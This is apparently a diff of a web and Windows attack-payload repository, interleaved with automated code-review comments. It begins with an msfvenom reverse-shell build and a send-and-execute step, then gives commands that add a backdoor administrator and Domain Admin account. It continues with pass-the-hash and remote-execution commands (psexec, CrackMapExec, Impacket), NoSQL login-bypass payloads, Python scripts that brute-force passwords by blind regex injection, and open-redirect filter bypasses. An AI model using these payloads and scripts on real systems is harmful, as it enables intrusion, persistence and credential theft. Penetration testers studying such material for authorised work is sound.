msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
python2 send_and_execute.py 10.0.0.1 revshell.exe
```
## References
* [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
* [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
* [TOP10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) * [TOP10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/)
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
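Review bot: the two nmap detection commands in this region (`nmap -Pn -p445--open--max-hostgroup 3--script smb-vuln-ms08-067 <ip_netblock>` and its MS17-010 counterpart) are missing the spaces between options and will not parse as written; they should read `nmap -Pn -p 445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>`, and the second one should name the script `smb-vuln-ms17-010`, which is the NSE script's actual name (there is no `smb-vuln-ms17010`). Two smaller points: the MS08-067 example lines refer to `MS08_067_2018.py` while the download and the final command use `ms08-067.py`, so one name should be used throughout, and the MS16-032 check (`wmic qfe list | findstr "3139914"`) would be more useful with a sentence saying that a hit means the KB is installed and the host is patched, so the section does not apply.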


@@ -3,8 +3,11 @@
## TIP 1 - Create your credential :D ## TIP 1 - Create your credential :D
```powershell ```powershell
net user hacker hacker /add net user hacker hacker1234* /add
net localgroup administrators hacker /add net localgroup administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add # RDP access
net localgroup "Backup Operators" hacker /add # Full access to files
net group "Domain Admins" hacker /add /domain
``` ```
Some info about your user Some info about your user
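Review bot: `net group "Domain Admins" hacker /add /domain` is inconsistent with the lines above it, which create `hacker` as a local account with `net user ... /add` (no `/domain`); a local account is not a domain principal, so this line should either be dropped or documented as assuming a domain account and Domain Admin rights. The comment on the Backup Operators line (`# Full access to files`) overstates the effect: membership grants the backup and restore privileges, which bypass file ACLs only through backup/restore semantics, not general full control. Worth a sentence for readers on the defensive side as well: account creation and group-membership changes are written to the Security event log, so these are among the easiest post-exploitation actions to detect.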
@@ -23,13 +26,24 @@ Username: RetailAdmin
Password: trs10 Password: trs10
``` ```
## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
```powershell
\\windowssandbox
Username: wdagutilityaccount
Password: pw123
```
## Metasploit - SMB ## Metasploit - SMB
```c ```c
use auxiliary/scanner/smb/smb_login use auxiliary/scanner/smb/smb_login
set SMBDomain CSCOU set SMBDomain DOMAIN
set SMBUser jarrieta set SMBUser username
set SMBPass nastyCutt3r set SMBPass password
services -p 445 -R services -p 445 -R
run run
creds creds
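Review bot: the WDAGUtilityAccount tip needs a subject: "it is part of Windows Defender Application Guard" should say that the account is created by Windows Defender Application Guard, and since the only source is a tweet, the date of the tweet should be recorded in the text alongside the link. Replacing the `CSCOU`/`jarrieta`/`nastyCutt3r` credentials with `DOMAIN`/`username`/`password` placeholders is the right call; the fence around the new block is tagged `powershell` although it holds a host name and a credential pair, so plain text is the better tag.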
@@ -42,8 +56,8 @@ Note: the password can be replaced by a hash to execute a `pass the hash` attack
```c ```c
use exploit/windows/smb/psexec use exploit/windows/smb/psexec
set RHOST 10.2.0.3 set RHOST 10.2.0.3
set SMBUser jarrieta set SMBUser username
set SMBPass nastyCutt3r set SMBPass password
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/meterpreter/bind_tcp
run run
shell shell
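Review bot: `set RHOST 10.2.0.3` keeps a lab-specific address while the rest of this change moved the examples to `10.10.10.10`; use the same placeholder here so the psexec example and the CrackMapExec/Impacket ones below refer to one host. Since the context line says the password can be replaced by a hash, the block should point to the "Crackmapexec (Pass The Hash)" section below, where the expected hash format is shown, otherwise readers will paste a bare hash into `SMBPass` and get an authentication failure.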
@@ -53,8 +67,8 @@ shell
```python ```python
git clone https://github.com/byt3bl33d3r/CrackMapExec.github git clone https://github.com/byt3bl33d3r/CrackMapExec.github
python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
``` ```
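Review bot: the clone URL `https://github.com/byt3bl33d3r/CrackMapExec.github` is still wrong after this change; a Git remote ends in `.git` (or nothing), so `.github` will not resolve and the line should read `git clone https://github.com/byt3bl33d3r/CrackMapExec.git`. Style point: the fence is tagged `python` but the block is shell commands, so `bash` (already used elsewhere in the repository) is the right tag.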
## Crackmapexec (Pass The Hash) ## Crackmapexec (Pass The Hash)
@@ -66,23 +80,29 @@ cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:55
## Winexe (Integrated to Kali) ## Winexe (Integrated to Kali)
```python ```python
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
``` ```
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) ## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
```python ```python
git clone https://github.com/CoreSecurity/impacket.git git clone https://github.com/CoreSecurity/impacket.git
python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python psexec.py DOMAIN/username:password@10.10.10.10
python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python smbexec.py DOMAIN/username:password@10.10.10.10
python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python wmiexec.py DOMAIN/username:password@10.10.10.10
# psexec.exe -s cmd
# switch admin user to NT Authority/System
``` ```
## RDP Remote Desktop Protocol (Impacket) ## RDP Remote Desktop Protocol (Impacket)
```powershell ```powershell
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python rdpcheck.py DOMAIN/username:password@10.10.10.10
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
# -g : the screen will take up 70% of your actual screen size
# -r disk:share : sharing a local folder during a remote desktop session
``` ```
Note: you may need to enable it with the following command Note: you may need to enable it with the following command
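Review bot: the two comment lines added to the Impacket block (`# psexec.exe -s cmd` and `# switch admin user to NT Authority/System`) describe the Sysinternals PsExec binary, not `psexec.py`, and belong in the "PsExec (Windows - Sysinternal)" section further down, which already shows `cmd.exe -s # get System shell`. In the RDP block the first `rdesktop` line now carries `-g 70 -r disk:share=/home/user/myshare` and is immediately followed by a second `rdesktop` line with the same options and a different share path; keep one of them (the second, which has the explanatory comments) and drop the other.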
@@ -105,39 +125,41 @@ or with crackmapexec
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
``` ```
For Server 2012 R2, Win8.1+ or with Metasploit
```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
```
with Metasploit
```powershell ```powershell
run getgui -u admin -p 1234 run getgui -u admin -p 1234
``` ```
Then log in using xfreerdp
```powershell
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
xfreerd /u:runner /v:10.0.0.1 # password will be asked
```
## Netuse (Windows) ## Netuse (Windows)
```powershell ```powershell
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r net use \\ordws01.cscou.lab /user:DOMAIN\username password
C$ C$
``` ```
## Runas (Windows - Kerberos auth) ## Runas (Windows - Kerberos auth)
```powershell ```powershell
runas /netonly /user:CSCOU\jarrieta "cmd.exe" runas /netonly /user:DOMAIN\username "cmd.exe"
``` ```
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) ## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
```powershell ```powershell
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
``` ```
## Thanks ## References
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
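Review bot: `xfreerd /u:runner /v:10.0.0.1` is a typo for `xfreerdp` and will fail with "command not found". The `xfreerdp ... /pth:...` line appears twice in this hunk (once under "For Server 2012 R2, Win8.1+ or with Metasploit" with `/v:192.168.1.12`, once under "Then log in using xfreerdp" with `/v:10.0.0.1`), and the first heading reads as if Metasploit were an alternative to the version requirement; keep a single xfreerdp block with the version note as a comment. The credential placeholders were applied to the `net use`, `runas` and `PsExec.exe` lines, but the host `ordws01.cscou.lab` still carries the original lab domain; replace it with a placeholder such as `\\hostname.domain.tld` for consistency.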

NoSQL Injection/README.md Normal file

@@ -0,0 +1,147 @@
# NoSQL injection
> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Summary
* [Tools](#tools)
* [Exploit](exploits)
* [Authentication Bypass](#authentication-bypass)
* [Extract length information](#extract-length-information)
* [Extract data information](#extract-data-information)
* [Blind NoSQL](#blind-nosql)
* [POST with JSON body](#post-with-json-body)
* [GET](#get)
* [MongoDB Payloads](#mongodb-payloads)
* [References](#references)
## Tools
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
## Exploit
### Authentication Bypass
Basic authentication bypass using not equal ($ne) or greater ($gt)
```json
in URL
username[$ne]=toto&password[$ne]=toto
in JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
```
### Extract length information
```json
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```
### Extract data information
```json
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
Extract data with "in"
```json
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## Blind NoSQL
### POST with JSON body
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/json'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = payload, headers = headers, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
### GET
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username='admin'
password=''
u='http://example.org/login'
while True:
for c in string.printable:
if c not in ['*','+','.','?','|', '#', '&', '$']:
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
r = requests.get(u + payload)
if 'Yeah' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
## MongoDB Payloads
```bash
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## References
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
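Review bot: the summary entry `* [Exploit](exploits)` is missing the `#`, so it links to a relative path instead of the heading; it should be `(#exploit)`. In both blind scripts the `while True` loop never ends: once no character in `string.printable` extends the match (end of the value, or a character excluded by the filter list), the outer loop spins forever re-sending the same requests, so track whether a pass added a character and `break` when it did not; `import urllib` is unused in both. The `json` fences contain the prose lines `in URL` / `in JSON` and the literal `undefined`, which is not JSON, so either split the URL and JSON payloads into separate fences or tag the block as text. Missing documentation: a README that shows `$ne`/`$regex` operators reaching the query should also say how to stop it (reject non-string values for fields such as `username` and `password` before they reach the driver, or use a sanitizing layer), so defenders reading the page take away the fix as well as the symptom.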


@@ -1,92 +0,0 @@
# NoSQL injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Exploit
Basic authentication bypass using not equal ($ne) or greater ($gt)
```json
in URL
username[$ne]=toto&password[$ne]=toto
in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
Extract length information
```json
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```
Extract data information
```json
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
## Blind NoSQL
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
## MongoDB Payloads
```bash
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## Thanks to
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
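Review bot: this deletion appears to be the old NoSQL injection README being replaced by the new `NoSQL Injection/README.md` in the hunk above, so the change should be recorded as a rename (`git mv`, or committed so that Git's rename detection pairs the two) to keep the file history in one place. Worth noting for the changelog that the old blind script used `u` without ever defining it (`requests.post(u, ...)`), which the new version fixes by setting `u="http://example.org/login"`.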


@@ -1,4 +1,20 @@
# OAuth 2 - Common vulnerabilities # OAuth
## Summary
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
- [OAuth private key disclosure](#oauth-private-key-disclosure)
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
- [Cross-Site Request Forgery](#cross-site-request-forgery)
- [References](#references)
## Stealing OAuth Token via referer
From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer
## Grabbing OAuth Token via redirect_uri ## Grabbing OAuth Token via redirect_uri
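Review bot: the summary anchors `#grabbing-oauth-token-via-redirect---uri` and `#executing-xss-via-redirect---uri` will not resolve: GitHub keeps underscores when it builds heading ids, so the headings `## Grabbing OAuth Token via redirect_uri` and `## Executing XSS via redirect_uri` get the ids `#grabbing-oauth-token-via-redirect_uri` and `#executing-xss-via-redirect_uri`. Renaming the title from "OAuth 2 - Common vulnerabilities" to "OAuth" loses information; "OAuth 2 - Vulnerabilities" or similar would keep the version. The referer section only quotes the tweet; add a line on the defence (a `Referrer-Policy` header such as `no-referrer` on pages that carry tokens, and keeping tokens out of URLs altogether) so the entry is not just an attack recipe.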
@@ -46,9 +62,10 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request. > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
## Thanks to ## References
* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html) * [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
* [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html) * [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
* [How I hacked Github again. - Egor Homakov](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html) * [How I hacked Github again. - Egor Homakov](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html)
* [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html) * [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html)
- [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton
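Review bot: the new reference uses a `-` bullet and a trailing "By Jack Whitton" while the four entries above use `*` and put the author after a dash inside the link text; make it `* [Bypassing Google Authentication on Periscope's Administration Panel - Jack Whitton](...)` so the list renders as one.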


@@ -2,6 +2,43 @@
> Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access. > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
## Summary
- [Exploitation](#exploitation)
- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx)
- [Fuzzing](#fuzzing)
- [Filter Bypass](#filter-bypass)
- [Common injection parameters](#common-injection-parameters)
- [References](#references)
## Exploitation
Lets say theres a `well known` website - https://famous-website.tld/. And let's assume that there's a link like :
```powershell
https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
```
After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.
What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
```powerhshell
https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
```
By visiting this url, if we get redirected to `evil-website.tld` after the signup, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.
## HTTP Redirection Status Code - 3xx
- [300 Multiple Choices](https://httpstatuses.com/300)
- [301 Moved Permanently](https://httpstatuses.com/301)
- [302 Found](https://httpstatuses.com/302)
- [303 See Other](https://httpstatuses.com/303)
- [304 Not Modified](https://httpstatuses.com/304)
- [305 Use Proxy](https://httpstatuses.com/305)
- [307 Temporary Redirect](https://httpstatuses.com/307)
- [308 Permanent Redirect](https://httpstatuses.com/308)
## Fuzzing ## Fuzzing
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
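Review bot: the second fence is tagged `powerhshell`, a typo that prevents highlighting and should be `powershell` (or plain text, since both blocks are URLs, not PowerShell). The new Exploitation paragraph has several typos: "Lets say theres" should be "Let's say there's", "like :" has a stray space, and "After signing up you get redirected to your account, this redirection is specified by ..." is a comma splice that should be two sentences. In the 3xx list, 304 Not Modified is a conditional-request response and never causes a redirect; either drop it or annotate it so readers do not look for open redirects behind it.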
@@ -12,7 +49,7 @@ To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your t
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
``` ```
## Exploitation ## Filter Bypass
Using a whitelisted domain or keyword Using a whitelisted domain or keyword
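Review bot: the `sed` expression in the context line, `s/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/`, has no `g` flag and unescaped dots, so it replaces only the first occurrence on each payload line and the dots match any character; `s/www\.whitelisteddomain\.tld/'"$WHITELISTEDDOMAIN"'/g` would be exact. The heading rename from "Exploitation" to "Filter Bypass" itself is correct, since it removes the duplicate heading created by the new Exploitation section above and matches the `#filter-bypass` summary entry.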
@@ -48,6 +85,7 @@ Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
Using "%E3%80%82" to bypass "." blacklisted character Using "%E3%80%82" to bypass "." blacklisted character
```powershell ```powershell
/?redir=google。com
//google%E3%80%82com //google%E3%80%82com
``` ```
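Review bot: `/?redir=google。com` and `//google%E3%80%82com` are the same payload (the raw U+3002 ideographic full stop and its percent-encoded form); a comment saying so would keep readers from counting them as two techniques. The text above should also explain why it works: the browser maps U+3002 to `.` when it parses the host name while a naive server-side filter compares raw characters, so the defence is to parse and normalize the URL the same way the browser will (or to allow only relative paths) before checking the host.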
@@ -124,9 +162,11 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
?return_path={payload} ?return_path={payload}
``` ```
## Thanks to ## References
* filedescriptor * filedescriptor
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
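Review bot: `* filedescriptor` is a bare handle with no link or title, unlike every other entry; either link it to the specific write-up being credited or move it to an acknowledgements line, since a list now titled "References" should be resolvable.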

README.md

@@ -2,23 +2,27 @@
A list of useful payloads and bypasses for Web Application Security. A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
